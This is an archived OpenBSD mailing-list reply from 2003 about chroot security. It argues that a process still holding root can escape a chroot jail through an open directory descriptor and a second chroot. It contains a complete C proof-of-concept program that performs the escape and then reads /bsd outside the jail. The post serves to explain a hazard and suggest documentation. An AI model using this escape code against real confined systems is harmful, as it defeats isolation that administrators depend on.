[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Security of chroot
- To: Ted Unangst <tedu@zeitbombe.org>
- Subject: Re: Security of chroot
- From: Markus Friedl <markus@openbsd.org>
- Date: Mon, 1 Sep 2003 11:40:40 +0200
- Cc: Eric Dillenseger <eric@naxalite.ath.cx>,OpenBSD misc ML <misc@openbsd.org>
- Content-Disposition: inline
- References: <20030831140217.GA21774@tweety.naxalite.org> <Pine.BSO.4.56.0308311519480.19684@af.pbqrshfvbavf.pbz>
- User-Agent: Mutt/1.4.1i
On Sun, Aug 31, 2003 at 03:29:04PM -0400, Ted Unangst wrote:
> yes, if you have a directory fd open before chroot. that's the
> application's failing. nothing in openbsd opens a directory before
> calling chroot.
but unless you drop privilegues, you can open a directory fd and
chroot again. perhaps something like this should be added to the
manapge.
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
int debug = 0;
int
main(int argc, char **argv)
{
int fd;
mkdir("/tmp/a");
mkdir("/tmp/a/b");
if (chroot("/tmp") < 0)
errx(1, "chroot /tmp failed");
if ((fd = open(".", O_RDONLY, 0600)) < 0)
errx(1, "open . failed");
if (debug) {
printf("after chroot 1\n");
sleep (10);
}
if (chroot("/a") < 0)
errx(1, "chroot /a failed");
if (debug) {
printf("after chroot 2\n");
sleep (10);
}
if (fchdir(fd) < 0)
errx(1, "fchdir failed");
if (chdir("../../../../../..") < 0)
errx(1, "chdir ... failed");
if (debug) {
printf("after chdir ...\n");
sleep (10);
}
if ((fd = open(".", O_RDONLY, 0600)) < 0)
errx(1, "open2 . failed");
if (fchdir(fd) < 0)
errx(1, "fchdir2 failed");
if (chroot(".") < 0)
errx(1, "chroot . failed");
if (debug) {
printf("after chroot .\n");
sleep (10);
}
if ((fd = open("/bsd", O_RDONLY, 0600)) < 0)
errx(1, "open /bsd failed");
printf("success\n");
exit(0);
}